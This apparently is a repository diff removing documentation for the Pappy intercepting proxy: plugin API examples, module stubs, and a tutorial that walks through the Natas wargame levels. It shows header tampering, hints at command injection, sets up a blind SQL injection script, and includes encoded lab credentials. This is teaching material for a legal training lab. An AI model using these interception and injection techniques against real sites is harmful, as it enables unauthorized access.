def print_hosts(line):
args = shlex.split(line)
reqs = yield load_reqlist(args[0])
for r in reqs:
print 'The host for request %s is: %s' % (r.reqid, r.host)
###############
## Plugin hooks
def load_cmds(cmd):
cmd.set_cmds({
'print_hosts': (print_hosts, None),
})
cmd.add_aliases([
])
And now we're good! If you run it without the crochet wrapper, it may still work. However, since the console assumes any functions it calls will be blocking, not having the wrapper could lead to weird errors.
Plugin API
==========
There are also some useful functions that you can use to interact with the request history and the context. It's somewhat limited for now, but for now you can at least look through history and create/send new requests. Hopefully the API will expand as people find themselves wanting to do new things. That means **if you're writing a plugin, let me know and I'll add any APIs you need**. For now at least, plugins will let you maintain state over the course of the session and let you define commands.
The best way to learn what you can do is to go through the :ref:`pappyproxy-package` and look at all the available functions.
API Functions
-------------
See :mod:`pappyproxy.plugin` for docs on all the functions you can use. You can also use any of the functions provided for writing macros (and vice-versa).
Storing Data on Disk
--------------------
Unfortunately, you're on your own if you want to store plugin specific stuff on disk. It's also important that you store any data that is specific to a project in the same directory as the data file. This is to make sure that if you encrypt your project folder, you can be sure that no sensitive data about the test can be found anywhere else. The only time you should store anything outside of the current directory is to store global plugin settings, and even then it would probably be better to parse options from ``config.config_dict``. Pappy doesn't even store data outside of the project directory except for its CA certificates.
However, if your plugin is a special snowflake that needs to store unencrypted, global settings, you should create a directory for your plugin in ``{config.DATA_DIR}/plugindata`` and put your files there. But again, avoid this if you can.
.. note::
Any project-specific data (ie anything that contains info about requests) should be stored in the project directory unless you have a really really good reason. This is because it must be possible to secure any sensitive data by encrypting the project folder and storing data outside of the directory will add complications.
.. warning::
Do not modify the data file schema. There is a good chance the schema will break in future versions of Pappy.
Storing Custom Request Metadata
-------------------------------
:class:`pappyproxy.http.Request` objects have a ``plugin_data`` attribute. It is a dictionary that is intended to be used by plugins to give the request custom metadata. If you want to store metadata about a request, it is suggested that you add a key to this dictionary and store any metadata you want under that key. You can use :func:`pappyproxy.http.Request.get_plugin_dict` to get a dictionary for a specific name. It will create an entry for that name if it doesn't exist. I also suggest defining a function plugin-wide for getting the plugin's data dict from a specific request. Since dictionaries are always passed by reference, any modifications you make to the returned dict will be applied to the request as well.
.. note::
You will need to save the request using something like :func:`pappyproxy.http.Request.save` or :func:`pappyproxy.http.Request.async_deep_save` in order to store the changes in the data file.
Here is an example plugin for storing the user-agent (if it exists) in the ``plugin_data`` dict of a request under the key ``agent``::
import crochet
import shlex
from twisted.internet import defer
from pappyproxy.util import load_reqlist
from pappyproxy.plugin import main_context
from pappyproxy.util import PappyException
DATA_KEY = 'agent'
def get_data(r):
return r.get_plugin_dict(DATA_KEY)
@crochet.wait_for(timeout=None)
@defer.inlineCallbacks
def update_agent_metadata(line):
for r in main_context().active_requests:
if 'user-agent' in r.headers:
get_data(r)['agent'] = r.headers['user-agent']
yield r.async_deep_save()
@crochet.wait_for(timeout=None)
@defer.inlineCallbacks
def view_agent(line):
args = shlex.split(line)
reqs = yield load_reqlist(args[0])
for r in reqs:
if 'agent' in get_data(r):
print 'The user agent for %s is "%s"' % (r.reqid, get_data(r)['agent'])
else:
print 'Request %s has no user agent data' % r.reqid
###############
## Plugin hooks
def load_cmds(cmd):
cmd.set_cmds({
'agent_update': (update_agent_metadata, None),
'view_agent': (view_agent, None),
})
cmd.add_aliases([
])
Useful Functions
----------------
See :mod:`pappyproxy.plugin` and :mod:`pappyproxy.util` for useful functions
Built In Plugins As Examples
============================
Built In Plugins
----------------
All the commands in Pappy are implemented as plugins. I have done what I could to avoid using internal functions as much as I could, but there are still some instances where I had to implement an internal function in order to get the functions I needed. However, you can still look them over to see how things are structured and see some examples of semi-complicated plugins.
Interceptor and Repeater
------------------------
Pappy's interceptor and repeater are fully implemented as a plugin. It defines an intercepting macro that handles saving then editing messages and commands that read those files and edit them. It relies on Twisted to switch between the macro handling the request and the command modifying it, so if you want to make something similar, you'll have to learn how to use deferreds.

129
docs/source/pappyproxy.rst
Unescape View File

@ -1,129 +0,0 @@
pappyproxy package
==================
Subpackages
-----------
.. toctree::
pappyproxy.plugins
pappyproxy.schema
pappyproxy.templates
pappyproxy.tests
pappyproxy.vim_repeater
Submodules
----------
pappyproxy.comm module
----------------------
.. automodule:: pappyproxy.comm
:members:
:undoc-members:
:show-inheritance:
pappyproxy.config module
------------------------
.. automodule:: pappyproxy.config
:members:
:undoc-members:
:show-inheritance:
pappyproxy.console module
-------------------------
.. automodule:: pappyproxy.console
:members:
:undoc-members:
:show-inheritance:
pappyproxy.context module
-------------------------
.. automodule:: pappyproxy.context
:members:
:undoc-members:
:show-inheritance:
pappyproxy.http module
----------------------
.. automodule:: pappyproxy.http
:members:
:undoc-members:
:show-inheritance:
pappyproxy.iter module
----------------------
.. automodule:: pappyproxy.iter
:members:
:undoc-members:
:show-inheritance:
pappyproxy.macros module
------------------------
.. automodule:: pappyproxy.macros
:members:
:undoc-members:
:show-inheritance:
pappyproxy.pappy module
-----------------------
.. automodule:: pappyproxy.pappy
:members:
:undoc-members:
:show-inheritance:
pappyproxy.plugin module
------------------------
.. automodule:: pappyproxy.plugin
:members:
:undoc-members:
:show-inheritance:
pappyproxy.proxy module
-----------------------
.. automodule:: pappyproxy.proxy
:members:
:undoc-members:
:show-inheritance:
pappyproxy.repeater module
--------------------------
.. automodule:: pappyproxy.repeater
:members:
:undoc-members:
:show-inheritance:
pappyproxy.session module
-------------------------
.. automodule:: pappyproxy.session
:members:
:undoc-members:
:show-inheritance:
pappyproxy.util module
----------------------
.. automodule:: pappyproxy.util
:members:
:undoc-members:
:show-inheritance:
Module contents
---------------
.. automodule:: pappyproxy
:members:
:undoc-members:
:show-inheritance:

62
docs/source/pappyproxy.schema.rst
Unescape View File

@ -1,62 +0,0 @@
pappyproxy.schema package
=========================
Submodules
----------
pappyproxy.schema.schema_1 module
---------------------------------
.. automodule:: pappyproxy.schema.schema_1
:members:
:undoc-members:
:show-inheritance:
pappyproxy.schema.schema_2 module
---------------------------------
.. automodule:: pappyproxy.schema.schema_2
:members:
:undoc-members:
:show-inheritance:
pappyproxy.schema.schema_3 module
---------------------------------
.. automodule:: pappyproxy.schema.schema_3
:members:
:undoc-members:
:show-inheritance:
pappyproxy.schema.schema_4 module
---------------------------------
.. automodule:: pappyproxy.schema.schema_4
:members:
:undoc-members:
:show-inheritance:
pappyproxy.schema.schema_5 module
---------------------------------
.. automodule:: pappyproxy.schema.schema_5
:members:
:undoc-members:
:show-inheritance:
pappyproxy.schema.update module
-------------------------------
.. automodule:: pappyproxy.schema.update
:members:
:undoc-members:
:show-inheritance:
Module contents
---------------
.. automodule:: pappyproxy.schema
:members:
:undoc-members:
:show-inheritance:

30
docs/source/pappyproxy.templates.rst
Unescape View File

@ -1,30 +0,0 @@
pappyproxy.templates package
============================
Submodules
----------
pappyproxy.templates.intmacro module
------------------------------------
.. automodule:: pappyproxy.templates.intmacro
:members:
:undoc-members:
:show-inheritance:
pappyproxy.templates.macro module
---------------------------------
.. automodule:: pappyproxy.templates.macro
:members:
:undoc-members:
:show-inheritance:
Module contents
---------------
.. automodule:: pappyproxy.templates
:members:
:undoc-members:
:show-inheritance:

62
docs/source/pappyproxy.tests.rst
Unescape View File

@ -1,62 +0,0 @@
pappyproxy.tests package
========================
Submodules
----------
pappyproxy.tests.test_context module
------------------------------------
.. automodule:: pappyproxy.tests.test_context
:members:
:undoc-members:
:show-inheritance:
pappyproxy.tests.test_http module
---------------------------------
.. automodule:: pappyproxy.tests.test_http
:members:
:undoc-members:
:show-inheritance:
pappyproxy.tests.test_mangle module
-----------------------------------
.. automodule:: pappyproxy.tests.test_mangle
:members:
:undoc-members:
:show-inheritance:
pappyproxy.tests.test_proxy module
----------------------------------
.. automodule:: pappyproxy.tests.test_proxy
:members:
:undoc-members:
:show-inheritance:
pappyproxy.tests.test_session module
------------------------------------
.. automodule:: pappyproxy.tests.test_session
:members:
:undoc-members:
:show-inheritance:
pappyproxy.tests.testutil module
--------------------------------
.. automodule:: pappyproxy.tests.testutil
:members:
:undoc-members:
:show-inheritance:
Module contents
---------------
.. automodule:: pappyproxy.tests
:members:
:undoc-members:
:show-inheritance:

22
docs/source/pappyproxy.vim_repeater.rst
Unescape View File

@ -1,22 +0,0 @@
pappyproxy.vim_repeater package
===============================
Submodules
----------
pappyproxy.vim_repeater.repeater module
---------------------------------------
.. automodule:: pappyproxy.vim_repeater.repeater
:members:
:undoc-members:
:show-inheritance:
Module contents
---------------
.. automodule:: pappyproxy.vim_repeater
:members:
:undoc-members:
:show-inheritance:

720
docs/source/tutorial.rst
Unescape View File

@ -1,720 +0,0 @@
The Pappy Proxy Tutorial
************************
.. contents:: Table of Contents
:local:
Getting Set Up
==============
Introduction
------------
This is a quick tutorial to get you started using Pappy like a pro. To do this, we'll be going through from `Natas <http://overthewire.org/wargames/natas/>`_. If you haven't done it yet and don't want it spoiled, I suggest giving it a try with Burp since we'll be telling you all the answers right off the bat.
Getting Started
---------------
The first thing you'll need to do is get Pappy installed.
Install from pypi::
$ pip install pappy
or install from source::
$ git clone --recursive https://github.com/roglew/pappy-proxy.git
$ cd pappy-proxy
$ pip install .
.. note::
Pappy only supports OS X and Linux! Nothing will work on Windows, sorry!
That was easy! Make a project directory anywhere for Natas and fire up Pappy.::
$ mkdir natas
$ cd natas
Copying default config to ./config.json
Proxy is listening on port 8000
pappy>
If you look at what's in the directory, you'll notice that there's a ``data.db`` file and a ``config.json`` file.
* ``data.db`` is a SQLite file that stores all the (in-scope) requests that pass through the proxy
* ``config.json`` stores settings for the proxy
You don't need to touch either of these right now. Just hop back into Pappy.
Installing Pappy's CA Cert
--------------------------
In order to intercept HTTPS requests, you'll need to add a CA cert to your browser. Installing the cert allows Pappy to act like a certificate authority and sign certificates for whatever it wants without your browser complaining.
To generate certificates, you'll use the ``gencerts`` command. This will generate certificates in Pappy's directory. By default, all projects will use the certs in this directory, so you should only have to generate/install the certificates once.::
pappy> gencerts
This will overwrite any existing certs in /home/anonymouse/pappy/pappyproxy/certs. Are you sure?
(y/N) y
Generating certs to /home/anonymouse/pappy/pappyproxy/certs
Generating private key... Done!
Generating client cert... Done!
pappy>
The directory that the certs get put in may be different for you. Next, you'll need to add the generated ``certificate.crt`` file to your browser. This is different for each browser.
Installing the Cert in Firefox
++++++++++++++++++++++++++++++
1. Open Firefox
2. Go to ``Preferences -> Advanced -> View Certificates -> Authorities``
3. Click ``Import``
4. Navigate to the directory where the certs were generated and double click ``certificate.crt``
Installing the Cert in Chrome
+++++++++++++++++++++++++++++
1. Open Chrome
2. Go to ``Preferences -> Show advanced settings -> HTTPS/SSL -> Manage Certificates -> Authorities``
3. Click ``Import``
4. Navigate to the directory where the certs were generated and double click ``certificate.crt``
Installing the Cert in Safari
+++++++++++++++++++++++++++++
1. Use Finder to navigate to the directory where the certs were generated
2. Double click the cert and follow the prompts to add it to your system keychain
Installing the Cert in Internet Explorer
++++++++++++++++++++++++++++++++++++++++
1. No.
Configuring Your Browser
------------------------
Next, you need to configure your browser to use the proxy. This is generally done using a browser extension. This tutorial won't cover how to configure these plugins. Pappy runs on localhost on port 8000. This can be changed in ``config.json``, but don't worry about that right now.
.. note::
Configure your browser extension to use the proxy server at **loalhost** on **port 8000**
Here are some proxy plugins that should work
* Firefox: `FoxyProxy <https://addons.mozilla.org/en-us/firefox/addon/foxyproxy-standard/>`_
* Chrome: `Proxy SwitchySharp <https://chrome.google.com/webstore/detail/proxy-switchysharp/dpplabbmogkhghncfbfdeeokoefdjegm?hl=en>`_
Testing it Out
--------------
Start up Pappy in Lite mode by running ``pappy -l``, enable the proxy in your browser, then navigate to a website::
/pappynatas/ $ pappy -l
Temporary datafile is /tmp/tmp5AQBrH
Proxy is listening on port 8000
pappy> ls
ID Verb Host Path S-Code Req Len Rsp Len Time Mngl
8 GET vitaly.sexy /favicon.ico 404 Not Found 0 114 0.21 --
7 GET vitaly.sexy /favicon.ico 404 Not Found 0 114 0.22 --
6 GET vitaly.sexy /esr1.jpg 200 OK 0 17653 0.29 --
5 GET vitaly.sexy /netscape.gif 200 OK 0 1135 0.22 --
4 GET vitaly.sexy /construction.gif 200 OK 0 28366 0.26 --
3 GET vitaly.sexy /vitaly2.jpg 200 OK 0 2034003 1.34 --
2 GET vitaly.sexy / 200 OK 0 1201 0.21 --
1 GET vitaly.sexy / 301 Moved Permanently 0 178 0.27 --
pappy> quit
Deleting temporary datafile
Make sure that the request you made appears on the list. When you quit, the temporary data file will be deleted, so no cleanup will be required!
The Tutorial
============
Setting the Scope
-----------------
The first thing we'll do is set up Pappy so that it only intercepts requests going to ``*.natas.labs.overthewire.org``::
pappy> filter host containsr "natas\.labs\.overthewire\.org$"
pappy> scope_save
What these commands do:
1. Make the current context only include requests whose host ends in ``natas.labs.overthewire.org``.
2. Save the current context as the scope
The context is basically requests that pass a list of rules. In this case, we have one rule that says that in order for a request to be in the current context, it must pass the regexp ``natas\.labs\.overthewire\.org$``. When we save the scope, we're saying that any request that doesn't pass this regexp is out of scope and shouldn't be touched.
If this doesn't make sense, don't worry, we'll come back to this.
Natas 0
-------
First, go to `<http://natas0.natas.labs.overthewire.org>`_ and log in with the default creds of ``natas0`` / ``natas0``. You should see a site that says "You can find the password for the next level on this page". You don't need Pappy for this one.
1. Right click the page and select "view source"
2. Read the password for natas1
3. Visit `<http://natas1.natas.labs.overthewire.org>`_ and log in with the username ``natas1`` and the password you found.
Natas 1
-------
Haha! This is the same as natas0, but they got tricky and shut off right-clicking. There's still ways to view the source in the browser, but we'll use Pappy here. The commands we'll learn here are ``ls``, ``vfq``, and ``vfs``.
* ``ls`` lists the most current requests that are in the current context. You'll be using this a lot to get the IDs of requests you want to do things with.
* ``vfq <reqid>`` prints the full request of a request you specify
* ``vfs <reqid>`` prints the full response to a request you specify
So to solve natas1, we'll want to view the full response to our request to the page::
pappy> ls
ID Verb Host Path S-Code Req Len Rsp Len Time Mngl
16 GET natas1.natas.labs.overthewire.org /favicon.ico 404 Not Found 0 307 0.27 --
15 GET natas1.natas.labs.overthewire.org /favicon.ico 404 Not Found 0 307 0.27 --
14 GET natas1.natas.labs.overthewire.org / 200 OK 0 1063 0.27 --
13 GET natas1.natas.labs.overthewire.org / 401 Unauthorized 0 479 0.27 --
12 GET natas0.natas.labs.overthewire.org /favicon.ico 404 Not Found 0 307 0.27 --
11 GET natas0.natas.labs.overthewire.org /favicon.ico 404 Not Found 0 307 0.26 --
10 GET natas.labs.overthewire.org /img/wechall.gif 200 OK 0 9279 0.28 --
9 GET natas.labs.overthewire.org /js/wechall.js 200 OK 0 1074 0.50 --
8 GET natas.labs.overthewire.org /js/wechall-data.js 200 OK 0 564 0.48 --
7 GET natas.labs.overthewire.org /js/jquery-ui.js 200 OK 0 435844 1.37 --
6 GET natas.labs.overthewire.org /js/jquery-1.9.1.js 200 OK 0 268381 1.20 --
4 GET natas.labs.overthewire.org /css/wechall.css 200 OK 0 677 0.48 --
5 GET natas.labs.overthewire.org /css/jquery-ui.css 200 OK 0 32046 0.49 --
3 GET natas.labs.overthewire.org /css/level.css 200 OK 0 1332 0.48 --
2 GET natas0.natas.labs.overthewire.org / 200 OK 0 918 0.26 --
1 GET natas0.natas.labs.overthewire.org / 401 Unauthorized 0 479 0.26 --
pappy> vfs 14
HTTP/1.1 200 OK
Date: Fri, 18 Dec 2015 19:47:21 GMT
Server: Apache/2.4.7 (Ubuntu)
Last-Modified: Fri, 14 Nov 2014 10:32:33 GMT
ETag: "427-507cf258a5240-gzip"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 1063
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
... snip ...
<!--The password for natas2 is [password] -->
... snip ...
pappy>
Yay!
Natas 2
-------
When you visit this page, you get a message saying "There is nothing on this page". That is probably a blatant lie. Let's see what was in that response.::
pappy> ls
ID Verb Host Path S-Code Req Len Rsp Len Time Mngl
30 GET natas2.natas.labs.overthewire.org /favicon.ico 404 Not Found 0 307 0.27 --
29 GET natas2.natas.labs.overthewire.org /favicon.ico 404 Not Found 0 307 0.27 --
28 GET natas2.natas.labs.overthewire.org /files/pixel.png 200 OK 0 303 0.27 --
27 GET natas2.natas.labs.overthewire.org / 200 OK 0 872 0.27 --
26 GET natas2.natas.labs.overthewire.org / 401 Unauthorized 0 479 0.27 --
... snip ...
pappy> vfs 27
HTTP/1.1 200 OK
... snip ...
<body>
<h1>natas2</h1>
<div id="content">
There is nothing on this page
<img src="files/pixel.png">
</div>
</body></html>
pappy>
So the only suspicious thing is ``<img src="files/pixel.png">``. I'll let you figure out the rest ;)
Natas 3
-------
This one doesn't require Pappy. Just view the ``robots.txt`` file.
Finding Your Passwords Later (How to Use Filters)
-------------------------------------------------
This section will explain how to use Pappy's filters to find passwords to levels you've already completed. Every in-scope request and response that goes through Pappy is stored in the ``data.db`` file in your project directory. We can use filter commands to search through these requests to find resposes with passwords.
Filters
+++++++
Here are the commands we'll learn:
1. ``filter <filter string>`` / ``f <filter string>`` Add a filter that limits which requests are included in the current context
2. ``fu`` Remove the most recently applied filter
3. ``sr`` Reset the context so that it matches the scope
4. ``filter_clear`` Remove all filters from the context, including the filters applied by the scope
5. ``fls`` Show all currently applied filters
The most complicated of these is the ``filter`` command since it takes a filter string as an argument. All a filter string is is a string that defines which requests will pass the filter. Anything that doesn't pass the filter will be removed from the context. Most filter strings are of the format ``<field> <comparer> <value>``. For example::
host is www.target.org
field = "host"
comparer = "is"
value = "www.target.org"
This filter will only match requests whose host is exactly ``www.target.org``. When defining our scope, we applied a filter using a ``containsr`` comparer. This matches any request where the field matches a regular expression. Here are a few fields and comparers:
Commonly used fields
* ``all`` The full text of the request and the response
* ``host`` The hostname of where the request is sent
* ``path`` The target path of the request. ie ``/path/to/page.php``
* ``verb`` The HTTP verb. ie ``POST`` or ``GET`` (case sensitive!)
* ``body`` The data section (the body) of either the request or the response
Commonly used comparers
* ``is <value>`` The field exactly matches the value
* ``contains <value>`` / ``ct <value>`` The field contains a value
* ``containsr <regexp>`` / ``ctr <regexp>`` The field matches a regexp. You may want to surround the regexp in quotes since a number of regexp characters are also control characters in the command line
You can find the rest of the fields and comparers (including some more complex ones) in the actual documentation.
Once you've applied some filters, ``ls`` will only show items that pass all the applied filters. If you want to return to viewing all in-scope items, use ``sr``. If you want to remove the last applied filter, use ``fu``.
Finding Passwords
+++++++++++++++++
While we can't find all the passwords with one filter, if we remember how we got the password, we can find it pretty quickly
For natas0 and natas1, the responses had a phrase like "the password is abc123". So we can filter out anything that doesn't have the word "password" in it.::
pappy> ls
ID Verb Host Path S-Code Req Len Rsp Len Time Mngl
52 GET natas4.natas.labs.overthewire.org /favicon.ico 404 Not Found 0 307 0.26 --
51 GET natas4.natas.labs.overthewire.org /favicon.ico 404 Not Found 0 307 0.27 --
50 GET natas4.natas.labs.overthewire.org / 200 OK 0 1019 0.27 --
49 GET natas4.natas.labs.overthewire.org / 401 Unauthorized 0 479 0.26 --
48 GET natas3.natas.labs.overthewire.org /s3cr3t/users.txt 200 OK 0 40 0.27 --
46 GET natas3.natas.labs.overthewire.org /icons/text.gif 200 OK 0 229 0.53 --
47 GET natas3.natas.labs.overthewire.org /icons/back.gif 200 OK 0 216 0.53 --
45 GET natas3.natas.labs.overthewire.org /icons/blank.gif 200 OK 0 148 0.53 --
44 GET natas3.natas.labs.overthewire.org /s3cr3t/ 200 OK 0 957 0.26 --
43 GET natas3.natas.labs.overthewire.org /s3cr3t 301 Moved Permanently 0 354 0.27 --
42 GET natas3.natas.labs.overthewire.org /robots.txt 200 OK 0 33 0.29 --
41 GET natas3.natas.labs.overthewire.org /favicon.ico 404 Not Found 0 307 0.26 --
40 GET natas3.natas.labs.overthewire.org /favicon.ico 404 Not Found 0 307 0.28 --
39 GET natas3.natas.labs.overthewire.org / 200 OK 0 923 0.26 --
38 GET natas3.natas.labs.overthewire.org / 401 Unauthorized 0 479 0.28 --
37 GET natas2.natas.labs.overthewire.org /files/users.txt 200 OK 0 145 0.28 --
36 GET natas2.natas.labs.overthewire.org /icons/text.gif 200 OK 0 229 0.47 --
35 GET natas2.natas.labs.overthewire.org /icons/image2.gif 200 OK 0 309 0.47 --
34 GET natas2.natas.labs.overthewire.org /icons/back.gif 200 OK 0 216 0.47 --
33 GET natas2.natas.labs.overthewire.org /icons/blank.gif 200 OK 0 148 0.47 --
32 GET natas2.natas.labs.overthewire.org /files/ 200 OK 0 1153 0.26 --
31 GET natas2.natas.labs.overthewire.org /files 301 Moved Permanently 0 353 0.27 --
30 GET natas2.natas.labs.overthewire.org /favicon.ico 404 Not Found 0 307 0.27 --
29 GET natas2.natas.labs.overthewire.org /favicon.ico 404 Not Found 0 307 0.27 --
28 GET natas2.natas.labs.overthewire.org /files/pixel.png 200 OK 0 303 0.27 --
pappy> f body ct password
pappy> ls
ID Verb Host Path S-Code Req Len Rsp Len Time Mngl
49 GET natas4.natas.labs.overthewire.org / 401 Unauthorized 0 479 0.26 --
38 GET natas3.natas.labs.overthewire.org / 401 Unauthorized 0 479 0.28 --
37 GET natas2.natas.labs.overthewire.org /files/users.txt 200 OK 0 145 0.28 --
26 GET natas2.natas.labs.overthewire.org / 401 Unauthorized 0 479 0.27 --
20 GET natas.labs.overthewire.org /js/wechall.js 200 OK 0 1074 0.47 --
24 GET natas.labs.overthewire.org /js/jquery-1.9.1.js 200 OK 0 268381 1.20 --
17 GET natas1.natas.labs.overthewire.org / 200 OK 0 1063 0.30 --
14 GET natas1.natas.labs.overthewire.org / 200 OK 0 1063 0.27 --
13 GET natas1.natas.labs.overthewire.org / 401 Unauthorized 0 479 0.27 --
9 GET natas.labs.overthewire.org /js/wechall.js 200 OK 0 1074 0.50 --
6 GET natas.labs.overthewire.org /js/jquery-1.9.1.js 200 OK 0 268381 1.20 --
2 GET natas0.natas.labs.overthewire.org / 200 OK 0 918 0.26 --
1 GET natas0.natas.labs.overthewire.org / 401 Unauthorized 0 479 0.26 --
pappy>
It looks like requests 2 and 14 are the ones we're looking for (we know the password is on the page and those are the requests to / that have a 200 OK response). Use ``vfs`` to look at the response and you'll get the passwords again! It looks like we also found the password from natas2 (the request to /s3cr3t/users.txt).
Anyways, back to Natas!
Natas 4
-------
When we visit this page, we get an error saying that they will only display the password if we visit from ``http://natas5.natas.labs.overthewire.org/``. How does a website track where you came from? The Referer header! Where's that defined? In a header! Do we control the headers? Yes! So all we have to do is set the Referer header to be the correct URL and we're golden.
To do this, we'll be using Pappy's interceptor. The interceptor lets you stop a request from the browser, edit it, then send it to the server. These are the commands we're going to learn:
* ``ic <req|rsp>+`` Begin interception mode. Intercepts requests and/or responses as decided by the arguments given in the command. ``ic req`` will only intercept requests, ``ic rsp`` will only intercept responses, and ``ic req rsp`` will intercept both.
In this case, we only want to intercept requests, so we'll run ``ic req``::
pappy> ic req
And we'll get a screen that says something like::
Currently intercepting: Requests
0 item(s) in queue.
Press 'n' to edit the next item or 'q' to quit interceptor.
Now refresh the page in your browser. The page will hang like it's taking a long time to load. Go back to Pappy, and now the interceptor will say something like::
Currently intercepting: Requests
1 item(s) in queue.
Press 'n' to edit the next item or 'q' to quit interceptor.
Press ``n`` and the request will be opened for editing! Which editor is used is defined by the ``EDITOR`` environment variable. Use the text editor to add a ``Referer`` header (note that there's only one r)::
GET / HTTP/1.1
Host: natas4.natas.labs.overthewire.org
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: __cfduid=db41e9d9b4a13cc3ef4273055b71996fb1450464664
Authorization: Basic bmF0YXM0Olo5dGtSa1dtcHQ5UXI3WHJSNWpXUmtnT1U5MDFzd0Va
Connection: keep-alive
Cache-Control: max-age=0
Referer: http://natas5.natas.labs.overthewire.org/
Save and quit, then press ``q`` to quit the interceptor. Go back to the browser and you should have the password for natas5! Yay!
Now if you run ls, you'll notice that the request we made has a ``q`` in the ``Mngl`` column. This means that we mangled the request. If there's an ``s`` in that column, it means we mangled the response. If we ever want to refer to the unmangled version of the request, just prefix the id with a u. For example, you can get the unmangled version of request ``12`` by using the id ``u12``.
Natas 5
-------
This one starts with a screen saying you're not logged in. This is fine. For this one, you'll need to use the interceptor to edit the value of a cookie. I'll let you figure that one out.
Natas 6
-------
This one you should be able to get
Natas 7
-------
You should get this one. Note the hint on the `overthewire website <http://overthewire.org/wargames/natas/>`_: All passwords are also stored in /etc/natas_webpass/. E.g. the password for natas5 is stored in the file /etc/natas_webpass/natas5 and only readable by natas4 and natas5.
Natas 8
-------
You should be able to get this one. If it sucks, google it.
Natas 9
-------
For this one, when you view the source you'll notice they're taking value you entered and inserting it directly into a command line command to grep a file. What we want to do is insert our own arguments to the command. For this one, we will learn how to use the repeater. Here is the command we will learn:
* ``rp <reqid>`` Open the vim repeater with the given request
* ``<leader>f`` (In the repeater) forward the request
.. note::
Use ``:wq!`` to quit the repeater without having to save buffers
.. note::
You must know the basics of how to use vim for the repeater and have a key bound to the leader. You can find more information on the leader key `here <https://stackoverflow.com/questions/1764263/what-is-the-leader-in-a-vimrc-file>`_. By default <leader> is bound to ``\``.
Submit a request then open that request in the repeater::
pappy> ls
196 GET natas9.natas.labs.overthewire.org /index.php?needle=ball&submit=Search 200 OK 0 1686 0.27 --
195 GET natas9.natas.labs.overthewire.org /index-source.html 200 OK 0 1952 0.27 --
... snip ...
pappy> rp 196
Vim will open up in a vertical split with the request on the left and the response on the right.
In the repeater, you edit the response on the left, then press the ``<leader>`` key then ``f`` to submit the modified request (note that your cursor must be in the left window). The response will then be put in the right window. This makes it easy to quickly make requests which are all slight variations of each other.
In this case, we'll be editing the ``needle`` get parameter. Try changing "ball" to "bill" and submitting it. You'll notice that the output in the right window changes to contain words that have the word "bill" in them. The repeater will make it easy to make tweaks to your payload and get quick feedback without having to use the browser.
Use the repeater to solve this challenge (you may need to url encode some characters by hand, unfortunately).
Skip a few... Natas 15
----------------------
All the challenges up to this point should be doable with the repeater/interceptor. Natas15 is where things get hairy though. This is a blind SQL injection, and you'll have to write a script to do it. Luckily for us, writing scripts using Pappy is easy. If you're lazy and don't want to actually do the challenges, google the password for natas15 then come back.
Commands we'll learn:
* ``gma <name> <reqid(s)>`` Generate a macro with objects pre-defined for the given requests
* ``lma`` Load macros
* ``rma <name> [args]`` Run a macro, optionally with arguments
So the first thing we'll do is submit a request to have a base request that we can modify. Submit a request with any username. You should get a response back saying the user doesn't exist. Now we'll generate a macro and use that request as a base for our script::
pappy> ls
ID Verb Host Path S-Code Req Len Rsp Len Time Mngl
224 POST natas15.natas.labs.overthewire.org /index.php 200 OK 14 937 0.27 --
223 POST natas15.natas.labs.overthewire.org /index.php 200 OK 12 937 0.27 --
222 GET natas15.natas.labs.overthewire.org /index-source.html 200 OK 0 3325 0.28 --
221 GET natas15.natas.labs.overthewire.org /favicon.ico 404 Not Found 0 308 0.25 --
220 GET natas15.natas.labs.overthewire.org /favicon.ico 404 Not Found 0 308 0.27 --
219 GET natas15.natas.labs.overthewire.org / 200 OK 0 1049 0.37 --
218 GET natas15.natas.labs.overthewire.org / 401 Unauthorized 0 480 0.27 --
... snip ...
pappy> gma brute 224
Wrote script to macro_brute.py
pappy>
Now open up ``macro_brute.py`` in your favorite text editor. You should have a script that looks like this::
from pappyproxy.http import Request, get_request, post_request
from pappyproxy.context import set_tag
MACRO_NAME = 'Macro 41855887'
SHORT_NAME = ''
###########
## Requests
# It's suggested that you call .copy() on these and then edit attributes
# as needed to create modified requests
##
req1 = Request((
'POST /index.php HTTP/1.1\r\n'
'Host: natas15.natas.labs.overthewire.org\r\n'
'User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0\r\n'
'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n'
'Accept-Language: en-US,en;q=0.5\r\n'
'Accept-Encoding: gzip, deflate\r\n'
'Referer: http://natas15.natas.labs.overthewire.org/\r\n'
'Cookie: __cfduid=db41e9d9b4a13cc3ef4273055b71996fb1450464664\r\n'
'Authorization: Basic bmF0YXMxNTpBd1dqMHc1Y3Z4clppT05nWjlKNXN0TlZrbXhkazM5Sg==\r\n'
'Connection: keep-alive\r\n'
'Content-Type: application/x-www-form-urlencoded\r\n'
'Content-Length: 14\r\n'
'\r\n'
'username=admin'
))
def run_macro(args):
# Example:
# req = req0.copy() # Copy req0
# req.submit() # Submit the request to get a response
# print req.response.raw_headers # print the response headers
# req.save() # save the request to the data file
# or copy req0 into a loop and use string substitution to automate requests
pass
Pappy will generate a script and create a ``Request`` object that you can use. Check out the real documentation to see everything you can do with a ``Request`` object. For now you just need to know a few things about it:
* :func:`~pappyproxy.http.Request.submit` Submit the request and store the response object
* :func:`~pappyproxy.http.Request.save` Save the request/response to the data file
* ``post_params`` A :class:`~pappyproxy.http.RepeatableDict` that represents the post parameters of the request. Can set/get prameters the same way as a dictionary.
It is suggested you go through the documentation to learn the rest of the attributes/functions.
To start out simple, we'll write a macro that lets us check a username from the Pappy console. To define a function, you define the ``run_macro`` function. The function is passed a list of arguments which represent the arguments entered. Here a ``run_macro`` function that we can define that will check if a user exists::
def run_macro(args):
to_check = args[0] # get the username to check
r = req1.copy() # make a copy of the base request
r.post_params['username'] = to_check # set the username param of the request
r.submit() # submit the request
if "This user doesn't exist." in r.response.raw_data: # check if the username is valid
print "%s is not a user" % to_check
else:
print "%s is a user!" % to_check
Then to run it::
pappy> lma
Loaded "<Macro Macro 41855887 (brute)>"
pappy> rma brute admin
admin is not a user
pappy> rma brute fooooo
fooooo is not a user
pappy> rma brute natas16
natas16 is a user!
pappy>
